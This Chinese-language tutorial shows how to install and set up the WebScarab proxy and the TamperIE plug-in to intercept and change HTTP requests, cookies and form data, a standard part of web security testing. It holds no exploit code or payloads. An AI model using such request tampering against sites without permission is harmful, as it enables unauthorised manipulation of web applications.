本文档介绍了两种可以截取并修改报文的代理工具：WebScarab 和TamperIE一、WebScarab的使用WebScarab一款代理软件，包括HTTP代理，网络爬行、网络蜘蛛，会话ID 分析，自动脚本接口，模糊测试工具，WEB格式的编码/解码，WEB服务描述语言和SOAP解析器等功能模块。

WebScarab基于GNU协议，使用Java编写，是WebGoat中所使用的工具之一。

1.先安装java运行库：/technetwork/java/javase/downloads/index.html2.下载并安装WebScarab:/projects/owasp/files/WebScarab/20070504-1631/webscarab-installer-20070504-1631.jar为安装包webscarab-selfcontained-20070504-1631.jar则是lite版，lite版本不提供修改报文功能，因此我们要下载webscarab-installer-20070504-1631.jar下载后双击安装包，next默认安装即可3.设置代理在IE浏览器的Internet选项——连接——局域网设置——代理服务器，勾选为LAN使用代理服务器，地址填写localhost，端口为8008，其他都不勾选。

4.打开WebScarab，在Proxy标签下的Manual Edit中选择Method，并勾选Intercept request：这里选择了GET，那么我们只能对GET请求的HTTP进行修改5.打开浏览器访问URL地址，WebScarab会获取页面的请求，并跳出对话框：可以直接对其中的内容进行修改二、TamperIE的使用TamperIE是一个IE浏览器的小插件，可以修改cookie和post、get提交的表单数据等，用这个小工具可以很方便地修改,而不必抓包再提交。